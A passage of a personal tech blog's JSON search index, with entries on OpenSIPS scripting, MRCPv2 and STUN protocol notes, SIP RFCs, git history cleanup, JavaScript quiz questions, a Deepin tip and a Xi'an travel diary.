","permalink":"https://wdd.js.org/posts/2022/12/why-i-dont-not-use-yuque-any-more/","summary":"我在2019年的六月份时候,开始使用语雀。\n一路走来,我见证了语雀的功能越来越多,但是于此同时,我也越来越讨厌语雀。\n2022年12月初,我基本上把语雀上的所有内容都迁移到我的hugo博客上。\n我的博客很乱,也很多。我写了一个脚本,一个一个知识库的搬迁,总体速度还算快,唯一不便的就是图片需要一个一个复制粘贴。\n有些图片是用语雀的绘图语言例如plantuml编写的,就只能截图保存了。\n总之,我也是蛮累的。\n简单列一下我不喜欢语雀的几个原因:\n性能差,首页渲染慢,常常要等很久,首页才能打开 产品定位混乱,随意更改用户数据 我记得有时候我把知识库升级成了空间,过了一段时间,不知道为什么空间由变成了知识库。 数字花园这个概念真的很烂。我好好的个人主页,某一天打开,大变样,换了个名字,叫做数字花园。甚至没有给用户一个选择保留老版本的个人主页的权利。太不尊重用户了!! 就好像你下班回家,看见房门被人撬开,你打开房门,看见有人在你的客厅种满大蒜,然后还兴高采烈的告诉你,看,这是您的数字菜园!多好,以后不用买蒜了。 会员的流量计费规则, 或许现在的计费规则已经变了,我也没有再充会员,但是再以前。即使是会员,也是按流量计费的。什么叫按流量计费,假如你的一篇博客里上传了一张1mb的图片,即使你后来把这个图片删了,这1mb的流量还是会存在。而且流量是一直往上涨的,还不像运营商,每月一号给你清零一次的机会。 ","title":"为什么我不再使用语雀"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? 
ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/3x/module-args/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? 
ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf 
","permalink":"https://wdd.js.org/opensips/pdf/","summary":" TelNYX.pdf OpenSIPS 2.3 mediasoup Cutting Edge WebRTC Video COnferencing FreeSWITCH-driven routing in OpenSIPS Voicenter: Contact center on Steroids Vlad_Paiu-Distributed_OpenSIPS_Systems_Cluecon14.pdf Vlad_Paiu-OpenSIPS_Summit_Austin_2015-Async.pdf Ionut_Ionita-OpenSIPS_Summit2017-Capturing_beyond_SIP FLAVIO_GONCALVES-Fraud_in_VoIP_Today.pdf Alexandr_Dubovikov-OpenSIPS_Summit2017-RTC_Threat_Intelligence_Exchange.pdf OpenSIPS_LoadBalancing.pdf Vlad_Paiu-OpenSIPS_Summit_2104-OpenSIPS_End_User_Services.pdf Razvan_Crainea-OpenSIPS_Summit2017-From_SIPI_Trunks_to_End_Users.pdf Razvan_Crainea-OpenSIPS_Summit-Scaling_Asterisk.pdf Vlad_Paiu-OpenSIPS_Summit-Service_Enabling_for_Asterisk.pdf Jonas_Borjesson-OpenSIPS_Summit_Austin_2015.pdf Michele_Pinasi-OpenSIPS_Summit2017-How_we_did_VoIP.pdf Bogdan_Iancu-OpenSIPS_Summit_Keynotes.pdf Giovanni_Maruzselli-OpenSIPS_Summit2017-Scaling_FreeSWITCHes.pdf Maksym_Sobolyev-OpenSIPS_Summit2017-Sippy_Labs_update.pdf docker-cluster.pdf voip malware attack tool .pdf Bogdan_Iancu-OpenSIPS_Summit-OpenSIPS_2_1.pdf Pete_Kelly-OpenSIPS_Workshop_Chicago_2015-Calling_Cards_B2BUA.pdf Bogdan_Iancu-OpenSIPS_Summit-keynotes.pdf Alex_Goulis-Opensips_CNAME.pdf OpenSIPS_2.0_Framework.pdf Norman_Brandinger-OpenSIPS_Summit_2014-Advanced_SIP_Routing_with_OpenSIPS_modules.pdf ","title":"Pdf学习资料"},{"content":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 
大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤\n","permalink":"https://wdd.js.org/posts/2022/12/xian-travel/","summary":"一年过半以后,偶然打开微信公众号,看到草稿箱里的篇文章。我才回想起去年带女友去西安的那个遥远的夏天。\n如今女友已经变成老婆,这篇文章我才想起来发表。\nday 1 钟楼 鼓楼 回民街 那是六月末的时候,和女友一起坐火车去了趟西安。\n为什么要去西安呢?据吃货女友说,西安有非常多的好吃的。所以人生是必须要去一趟的。\n清晨,我们从南京南站出发坐动车,一路向西,坐了5个多小时,到达西安北站。\n路上我带了一个1500ml的水瓶,以及1500ml的酸奶。\n女友吐槽说,还好没做飞机,不然我就像宝强一样,要在机场干完一大瓶酸奶了。\n下了动车,立即前往钟楼订的宾馆,放置行李。\n西安钟楼位于西安市中心,是中国现存钟楼中形制最大、保存最完整的一座。建于明太祖洪武十七年,初建于今广济街口,与鼓楼相对,明神宗万历十年整体迁移于今址。\n沿着钟楼附近,我们逛了一圈回民街。\n回民街是西安著名的美食文化街区,是西安小吃街区。\n西安回民街作为西安风情的代表之一,是回民街区多条街道的统称,由北广济街、北院门、西羊市、大皮院、化觉巷、洒金桥等数条街道组成,在钟鼓楼后。\n钟楼\nday 2 大唐芙蓉城 大唐不夜城 大雁塔 大唐芙蓉城是一座仿唐建筑,里面有许多景点,或许我们不应该早上来,因为上午太热了。\n唯一庆幸的是,我们带了一个很大的水杯,而且芙蓉城里提供免费的开水,所以我们才没有被渴死。\n大唐芙蓉城 西游师徒四人 雕塑\n傍晚的 大唐不夜城\n夜幕降临的 大唐不夜城\n遗憾之一:大雁塔没有去看,因为当时正在维修,周围全是脚手架。 遗憾之二:没有到陕西历史博物馆看看,因为没有早点预约\n女友埋怨我说我不早点做攻略,害得这么多景点去不了。\n我说我是做了攻略的,还记在备忘录里面呢。\n女友打开我的备忘录一看,笑出眼泪说:你做的啥狗屁攻略,就这几个字!男人果然靠不住!\n我说: 这你就不懂了吧,啥都写清楚,一个一个点打卡多没意思。\nday3 华清宫 兵马俑 长恨歌 
由于西安攻略做的太过肤浅,所以第二天晚上决定直接跟团。在网上买了两张华清宫兵马俑和长恨歌的一日游。\n说实在的,华清宫没啥意思,都是洗澡池子。\n蒋介石洗过澡的池子,杨贵妃的洗澡池子,唐明皇的洗澡池子,大臣们的洗澡池子。\n逛完之后,下午我们坐着旅游大巴,前往兵马俑。\n一号坑\n一号坑\n一号坑\n一号坑\n一号坑\n兵马俑有三个坑。\n一号坑最大,兵马俑也是最多的。然而当时游客比肩接踵,加上天气炎热,大家都在里面像蒸桑拿一样。\n出了一号坑,我心里想:这么大个坑,这么热为啥不装空调,难道是因为要保护文物吗?\n后来据博物馆的讲解员介绍:不装空调是因为审核手续复杂,可能要要个几十年手续才能完成。像二号坑和三号坑都已经装好空调了。\n二号坑真的是个坑,没有兵马俑,仅仅是个大坑。\n三号坑比较小,仅有几个陶俑。\n长恨歌实际上是一个大型的室外表演,由白居易的《长恨歌》演绎而来,讲述唐明皇和杨贵妃的爱恨情长。灯光绚丽,舞蹈优美,感人至深。\n关于西安美食就很多了\n毛笔酥\n六大碗\n毛笔酥 酸梅汤","title":"西安之旅 不仅有羊肉泡馍 也有长恨歌"},{"content":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2. Often, \u0026lsquo;server\u0026rsquo; in this document refers to an MRCP server. MRCP 客户端: An entity controlling one or more Media Resources through MRCPv2 (\u0026ldquo;Client\u0026rdquo; for short). DTMF: Dual-Tone Multi-Frequency; a method of transmitting key presses in-band, either as actual tones (Q.23 [Q.23]) or as named tone events (RFC 4733 [RFC4733]). Endpointing: The process of automatically detecting the beginning and end of speech in an audio stream. This is critical both for speech recognition and for automated recording as one would find in voice mail systems. Hotword Mode: A mode of speech recognition where a stream of utterances is evaluated for match against a small set of command words. This is generally employed either to trigger some action or to control the subsequent grammar to be used for further recognition. 
架构 客户端使用SIP/SDP建立MRCP控制通道 SIP使用SDP的offer/answer模型来描述MRCP通道的参数 服务端在answer SDP中提供唯一的通道ID和服务端TCP端口号 客户端可以开启一个新的TCP链接,多个MRCP通道也可以共享一个TCP链接 管理资源控制通道 This \u0026ldquo;m=\u0026rdquo; line MUST have a media type field of \u0026ldquo;application\u0026rdquo; transport type field of either \u0026ldquo;TCP/MRCPv2\u0026rdquo; or \u0026ldquo;TCP/TLS/MRCPv2\u0026rdquo; The port number field of the \u0026ldquo;m=\u0026rdquo; line MUST contain the \u0026ldquo;discard\u0026rdquo; port of the transport protocol (port 9 for TCP) in the SDP offer from the client MUST contain the TCP listen port on the server in the SDP answer MRCPv2 servers MUST NOT assume any relationship between resources using the same port other than the sharing of the communication channel. To remain backwards compatible with conventional SDP usage, the format field of the \u0026ldquo;m=\u0026rdquo; line MUST have the arbitrarily selected value of \u0026ldquo;1\u0026rdquo;. The a=connection attribute MUST have a value of \u0026ldquo;new\u0026rdquo; on the very first control \u0026ldquo;m=\u0026rdquo; line offer from the client to an MRCPv2 server Subsequent control \u0026ldquo;m=\u0026rdquo; line offers from the client to the MRCP server MAY contain \u0026ldquo;new\u0026rdquo; or \u0026ldquo;existing\u0026rdquo;, depending on whether the client wants to set up a new connection or share an existing connection When the client wants to deallocate the resource from this session, it issues a new SDP offer, according to RFC 3264 [RFC3264], where the control \u0026ldquo;m=\u0026rdquo; line port MUST be set to 0 When the client wants to tear down the whole session and all its resources, it MUST issue a SIP BYE request to close the SIP session. This will deallocate all the control channels and resources allocated under the session. 
MRCPv2 Session Termination If an MRCP client notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously initiated a re-INVITE to close that channel, it MUST send a BYE to close down the SIP dialog and all other MRCP channels. If an MRCP server notices that the underlying connection has been closed for one of its MRCP channels, and it has not previously received and accepted a re-INVITE closing that channel, then it MUST send a BYE to close down the SIP dialog and all other MRCP channels.\nMRCP request request-line = mrcp-version SP message-length SP method-name SP request-id CRLF request-id = 1*10DIGIT MRCP response response-line = mrcp-version SP message-length SP request-id SP status-code SP request-state CRLF status-code = 3DIGIT request-state = \u0026ldquo;COMPLETE\u0026rdquo; / \u0026ldquo;IN-PROGRESS\u0026rdquo; / \u0026ldquo;PENDING\u0026rdquo; event event-line = mrcp-version SP message-length SP event-name SP request-id SP request-state CRLF event-name = synthesizer-event / recognizer-event / recorder-event / verifier-event 参考 https://www.rfc-editor.org/rfc/rfc6787 ","permalink":"https://wdd.js.org/posts/2022/12/mrcp-notes/","summary":"简介 MRCPv2 是Media Resource Control Protocol Version 2的缩写 MRCP 允许客户端去操作服务端的媒体资源处理 MRCP 的常见功能如下 文本转语音 语音识别 说话人识别 语音认证 等等 MRCP 并不是一个独立的协议,而是依赖于其他的协议,如 SIP/SDP MRCPv2 RFC 发表于 2012 年 MRCPv2 主要由思科,Nuance,Speechworks 开发 MRCPv2 是基于 MRCPv1 开发的 MRCPv2 不兼容 MRCPv1 MRCPv2 在传输层使用 TCP 或者 TLS 定义 媒体资源: An entity on the speech processing server that can be controlled through MRCPv2. 
MRCP 服务器: Aggregate of one or more \u0026ldquo;Media Resource\u0026rdquo; entities on a server, exposed through MRCPv2.","title":"MRCPv2 协议学习"},{"content":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","permalink":"https://wdd.js.org/git/clean-all-history/","summary":"有些时候,git 仓库累积了太多无用的历史更改,导致 clone 文件过大。如果确定历史更改没有意义,可以采用下述方法清空历史,\n先 clone 项目到本地目录 (以名为 mylearning 的仓库为例) git clone git@gitee.com:badboycoming/mylearning.git 进入 mylearning 仓库,拉一个分支,比如名为 latest_branch git checkout --orphan latest_branch 添加所有文件到上述分支 (Optional) git add -A 提交一次 git commit -am \u0026#34;Initial commit.\u0026#34; 删除 master 分支 git branch -D master 更改当前分支为 master 分支 git branch -m master 将本地所有更改 push 到远程仓库 git push -f origin master 关联本地 master 到远程 master git branch --set-upstream-to=origin/master ","title":"清除所有GIT历史记录"},{"content":"git remote set-url origin repo-url ","permalink":"https://wdd.js.org/git/remote-url/","summary":"git remote set-url origin repo-url ","title":"GIT 重新设置远程url"},{"content":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.log(a) } test2() test3() 4. 
分析输出 class Chameleon { static colorChange(newColor) { this.newColor = newColor return this.newColor } constructor({ newColor = \u0026#39;green\u0026#39; } = {}) { this.newColor = newColor } } const freddie = new Chameleon({ newColor: \u0026#39;purple\u0026#39; }) freddie.colorChange(\u0026#39;orange\u0026#39;) 5. 分析输出 function Person(firstName, lastName) { this.firstName = firstName this.lastName = lastName } const member = new Person(\u0026#39;Lydia\u0026#39;, \u0026#39;Hallie\u0026#39;) Person.getFullName = function () { return `${this.firstName} ${this.lastName}` } console.log(member.getFullName()) 6. 事件传播的三个阶段是什么? A: Target \u0026gt; Capturing \u0026gt; Bubbling B: Bubbling \u0026gt; Target \u0026gt; Capturing C: Target \u0026gt; Bubbling \u0026gt; Capturing D: Capturing \u0026gt; Target \u0026gt; Bubbling 7. 所有对象都有原型 A: 对 B: 错\n8. 输出? function sum(a, b) { return a + b } sum(1, \u0026#39;2\u0026#39;) 9. 输出? function getPersonInfo(one, two, three) { console.log(one) console.log(two) console.log(three) } const person = \u0026#39;Lydia\u0026#39; const age = 21 getPersonInfo`${person} is ${age} years old` 输出? function checkAge(data) { if (data === { age: 18 }) { console.log(\u0026#39;You are an adult!\u0026#39;) } else if (data == { age: 18 }) { console.log(\u0026#39;You are still an adult.\u0026#39;) } else { console.log(`Hmm.. You don\u0026#39;t have an age I guess`) } } checkAge({ age: 18 }) 输出? function getAge(...args) { console.log(typeof args) } getAge(21) ","permalink":"https://wdd.js.org/fe/js-questions/","summary":"1. 分析输出 for (var i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } for (let i = 0; i \u0026lt; 3; i++) { setTimeout(() =\u0026gt; console.log(i), 1) } 2. 分析输出 const shape = { radius: 10, diameter() { return this.radius * 2 }, perimeter: () =\u0026gt; 2 * Math.PI * this.radius, } shape.diameter() shape.perimeter() 3. 
分析输出 const a = {} function test1(a) { a = { name: \u0026#39;wdd\u0026#39;, } } function test2() { test1(a) } function test3() { console.","title":"JS 考题"},{"content":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","permalink":"https://wdd.js.org/posts/2022/11/deepin-install-man/","summary":"想查资料,发现 deepin 居然没有 man 这个命令。\n安装 sudo apt-get install man-db 使用介绍 ","title":"Deepin安装man命令"},{"content":"脚本变量 avp 变量 伪变量 SIP 头, $(hrd(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols). When N=\u0026rsquo;*\u0026rsquo;, all headers of that type are printed.\nThe module should identify most of compact header names (the ones recognized by OpenSIPS which should be all at this moment), if not, the compact form has to be specified explicitly. It is recommended to use dedicated specifiers for headers (e.g., %ua for user agent header), if they are available \u0026ndash; they are faster.\n$(hdrcnt(name)) \u0026ndash; returns number of headers of type given by \u0026rsquo;name\u0026rsquo;. Uses same rules for specifying header names as $hdr(name) above. Many headers (e.g., Via, Path, Record-Route) may appear more than once in the message. This variable returns the number of headers of a given type.\nNote that some headers (e.g., Path) may be joined together with commas and appear as a single header line. 
This variable counts the number of header lines, not header values.\nFor message fragment below, $hdrcnt(Path) will have value 2 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt; Path: \u0026lt;b.com\u0026gt; For message fragment below, $hdrcnt(Path) will have value 1 and $(hdr(Path)[0]) will have value \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt;:\nPath: \u0026lt;a.com\u0026gt;,\u0026lt;b.com\u0026gt; Note that both examples above are semantically equivalent but the variables take on different values.\n","permalink":"https://wdd.js.org/2.4.x-docs/core-vars/","summary":"脚本变量 avp 变量 伪变量 SIP 头, $(hrd(name)) $(hdr(name)[N]) - represents the body of the N-th header identified by \u0026rsquo;name\u0026rsquo;. If [N] is omitted then the body of the first header is printed. The first header is got when N=0, for the second N=1, a.s.o. To print the last header of that type, use -1, no other negative values are supported now. No white spaces are allowed inside the specifier (before }, before or after {, [, ] symbols).","title":"核心变量"},{"content":" RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.ietf.org/html/rfc2663 IP Network Address Translator (NAT) 
Terminology and Considerations https://tools.ietf.org/html/rfc3605 Real Time Control Protocol (RTCP) attribute in Session Description Protocol (SDP) https://tools.ietf.org/html/rfc3711 The Secure Real-time Transport Protocol (SRTP) https://tools.ietf.org/html/rfc4568 Session Description Protocol (SDP) Security Descriptions for Media Streams https://tools.ietf.org/html/rfc4585 Extended RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/AVPF) https://tools.ietf.org/html/rfc5124 Extended Secure RTP Profile for Real-time Transport Control Protocol (RTCP)-Based Feedback (RTP/SAVPF) https://tools.ietf.org/html/rfc5245 Interactive Connectivity Establishment (ICE): A Protocol for Network Address Translator (NAT) Traversal for Offer/Answer Protocols https://tools.ietf.org/html/rfc5626 Managing Client-Initiated Connections in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc5761 Multiplexing RTP Data and Control Packets on a Single Port https://tools.ietf.org/html/rfc5764 Datagram Transport Layer Security (DTLS) Extension to Establish Keys for the Secure Real-time Transport Protocol (SRTP) ","permalink":"https://wdd.js.org/opensips/ch1/sip-rfcs/","summary":"RFC 名称 https://tools.ietf.org/html/rfc3261 SIP: Session Initiation Protocol https://tools.ietf.org/html/rfc3665 Session Initiation Protocol (SIP) Basic Call Flow Examples https://tools.ietf.org/html/rfc6141 Re-INVITE and Target-Refresh Request Handling in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc4566 SDP: Session Description Protocol https://tools.ietf.org/html/rfc4028 Session Timers in the Session Initiation Protocol (SIP) https://tools.ietf.org/html/rfc1889 RTP: A Transport Protocol for Real-Time Applications https://tools.ietf.org/html/rfc2326 Real Time Streaming Protocol (RTSP) https://tools.ietf.org/html/rfc2327 SDP: Session Description Protocol https://tools.ietf.org/html/rfc3015 Megaco Protocol Version 1.0 
https://tools.ietf.org/html/rfc1918 Address Allocation for Private Internets https://tools.","title":"SIP相关RFC协议"},{"content":" title: \u0026ldquo;STUN协议笔记\u0026rdquo; date: \u0026ldquo;2022-01-06 17:54:10\u0026rdquo; draft: false STUN是Simple Traversal of User Datagram Protocol (UDP) through Network Address Translators (NAT’s)的缩写 传输层底层用的是UDP 主要用来NAT穿透 主要用来解决voip领域的单方向通话(one-way)的问题 目的是让NAT后面的设备能发现自己的公网IP以及NAT的类型 让外部设备能够找到合适的端口和内部设备通信 刷新NAT绑定,类似keep-alive机制。否则端口映射可能因为超时被释放 STUN是cs架构的协议 客户端端192.168.1.3,使用5060端口,发送stun请求到 64.25.58.65, 经过了192.168.1.1的网关之后 网关将源ip改为212.128.56.125, 端口改为15050 stun服务器将请求发送到 网关的外网端口15050,然后网关将请求转发给192.168.1.3:5060 stun message type which typically is one of the below: - 0x0001 : Binding Request - 0x0101 : Binding Response\n0x0111 : Binding Error Response 0x0002 : Shared Secret Request 0x0102 : Shared Secret Response 0x0112 : Shared Secret Error Response **0x0001: MAPPED-ADDRESS - **This attribute contains an IP address and port. It is always placed in the Binding Response, and it indicates the source IP address and port the server saw in the Binding Request sent from the client, i.e.; the STUN client’s public IP address and port where it can be reached from the internet.\n0x0002: RESPONSE-ADDRESS - This attribute contains an IP address and port and is an optional attribute, typically in the Binding Request (sent from the STUN client to the STUN server). It indicates where the Binding Response (sent from the STUN server to the STUN client) is to be sent. If this attribute is not present in the Binding Request, the Binding Response is sent to the source IP address and port of the Binding Request which is attribute 0x0001: MAPPED-ADDRESS.\n0x0003: CHANGE-REQUEST - This attribute, which is only allowed in the Binding Request and optional, contains two flags; to control the IP address and port used to send the response. These flags are called \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags. 
The \u0026ldquo;change IP\u0026rdquo; and \u0026ldquo;change Port\u0026rdquo; flags are useful for determining whether the client is behind a restricted cone NAT or restricted port cone NAT. They instruct the server to send the Binding Responses from a different source IP address and port.\n**0x0004: SOURCE-ADDRESS - **This attribute is usually present in Binding Responses; it indicates the source IP address and port where the response was sent from, i.e. the IP address of the machine the client is running on (typically an internal private IP address). It is very useful as from this attribute the STUN server can detect twice NAT configurations.\n**0x0005: CHANGED-ADDRESS - **This attribute is usually present in Binding Responses; it informs the client of the source IP address and port that would be used if the client requested the 